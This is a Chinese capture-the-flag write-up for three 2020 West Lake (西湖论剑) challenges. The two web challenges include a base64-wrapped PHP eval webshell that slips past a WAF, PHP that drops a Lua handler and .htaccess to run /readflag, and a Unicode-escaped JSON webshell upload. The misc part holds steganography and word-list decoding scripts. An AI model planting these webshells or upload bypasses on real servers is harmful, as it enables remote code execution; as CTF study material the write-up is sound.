西湖论剑 newupload
打开是一个文件上传界面,文件名不能含有php,还会对文件头进行检查,看了wp 用换行就看绕过头部检测,同时对对文件内容进行了检测,需要上传png图片马
在进行getshell时,可以发现被宝塔拦截了,那就用base64来绕,重新上传马
<?php eval(base64_decode($_POST[penson]));?>
成功执行
在执行system函数时
这边提示说明system被禁
回过头查看phpinfo
同时看到open_basedir 也进行了限制,本来想用蚁剑来进行连接的,俺也不知道为啥连接不了
这边绕过open_basedir
这种绕过⑧行
emmm先记下
接着是重点
上次.htaccess文件解析lua文件从而执行/readflag
不知道这是怎么搜到的,emmm
wp在这
http://www.qfrost.com/CTF/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91_2020/
file_put_contents('1.lua', 'require "string"
function handle(r)
r.content_type = "text/plain"
if r.method == "GET" then
local a = io.popen("/readflag")
local b = a:read("*all")
r:puts(b)
end
return apache2.OK
end');
file_put_contents('.htaccess', '<Files "*.lua">
SetHandler lua-script
</Files>');
西湖论剑 easyjson
分析源码
后面有个函数,对文件名和文件内容进行了检查,然后通过json的格式写入文件
草了,这题没咋看
,之前做过类似的题
Unicode编码绕过
https://blog.csdn.net/SopRomeo/article/details/107636982
json会自动解析Unicode编码,这个黑盒也挺难想的
一个师傅爬的源码,他是对文件名进行过滤
直接传个马进去
payload
{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u003c\u003f\u0070\u0068\u0070 \u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0027\u0070\u0065\u006e\u0073\u006f\u006e\u0027\u005d\u0029\u003b\u003f\u003e"}
查flag即可
没有提权直接读
MIsc yusapapa
查看源码PCG密码
https://zh.wikipedia.org/wiki/PGP%E8%AF%8D%E6%B1%87%E8%A1%A8
爬虫爬一下
import requests
from bs4 import BeautifulSoup
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'
}
url ='https://zh.wikipedia.org/wiki/PGP%E8%AF%8D%E6%B1%87%E8%A1%A8'
response = requests.get(url, headers=headers)
soup = BeautifulSoup(response.text, 'html.parser')
tr = soup.find_all('table',class_='wikitable')
found={}
for n in range(0,len(tr)):
tn = tr[n].find_all('tr')
for j in tn[1:]:
td = j.find_all('td')
hex = td[0].get_text().strip()
ji = td[1].get_text().strip()
ou = td[2].get_text().strip()
found[hex]=[ji,ou]
text='endow gremlin indulge bison flatfoot fallout goldfish bison hockey fracture fracture bison goggles jawbone bison flatfoot gremlin glucose glucose fracture flatfoot indoors gazelle gremlin goldfish bison guidance indulge keyboard keyboard glucose fracture hockey bison gazelle goldfish bison cement frighten gazelle goldfish indoors buzzard highchair fallout highchair bison fallout goldfish flytrap bison fallout goldfish gremlin indoors frighten fracture highchair bison cement fracture goldfish flatfoot gremlin flytrap fracture buzzard guidance goldfish freedom buzzard allow crowfoot jawbone bison indoors frighten fracture bison involve fallout jawbone Burbank indoors frighten fracture bison guidance gazelle flatfoot indoors indulge highchair fracture bison hockey frighten gremlin indulge flytrap bison flagpole fracture bison indulge hockey fracture flytrap bison allow blockade endow indulge hockey fallout blockade bison gazelle hockey bison inverse fracture highchair jawbone bison gazelle goggles guidance gremlin highchair indoors fallout goldfish indoors bison gazelle goldfish bison indoors frighten gazelle hockey bison flatfoot frighten fallout glucose glucose fracture goldfish freedom fracture blackjack blackjac'
text=text.split(' ')
flag=''
for t in text:
for key in found:
if t in found[key]:
flag+=key
print(flag)
下载/hint.rar 和 encode.png
当时只做到这一步
emmm
wp里说encode.webp 也有隐写
http://www.jojo-m.cn/2020/10/09/%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%91/#Yusapapa
用stegpy工具(没见过)
安装教程
https://blog.csdn.net/Amherstieae/article/details/109010064
那个webp我没下下来
wp里有
the_password_is:Yus@_1s_YYddddsstegpy encode.webp the_key_is:Yus@_yydsstegpy!!
第二个就是hint.rar的密码
然后就是InvisibleSecre隐写
题目提示说了,Yusa很重要
这个软件会自动生成py文件
草,不知道那个encode有啥用
emmm
exp
from PIL import Image,ImageDraw
p = Image.open('encode.png').convert('RGB')
a,b = p.size
R=[]
G=[]
B=[]
for x in range(a):
for y in range(b):
R.append(bin(p.getpixel((x,y))[0]).replace('0b','').zfill(8))
G.append(bin(p.getpixel((x, y))[1]).replace('0b', '').zfill(8))
B.append(bin(p.getpixel((x, y))[2]).replace('0b', '').zfill(8))
R1=[]
G1=[]
B1=[]
flag=[]
for i in range(len(R)):
R1.append(int(R[i][-1:]))
G1.append(int(G[i][-1:]))
B1.append(int(B[i][-1:]))
print(R1[100:150])
print(G1[100:150])
print(B1[100:150])
for i in range(len(R1)):
flag.append(B1[i]^G1[i]^R1[i])
print(flag[100:150])
de_p = Image.new('L',(a,b),255)
c=0
for x in range(a):
for y in range(b):
if flag[c] == 1:
de_p.putpixel((x,y),0)
else:
de_p.putpixel((x, y), 255)
c=c+1
de_p.save('out.png')
我得学学那个库了emmm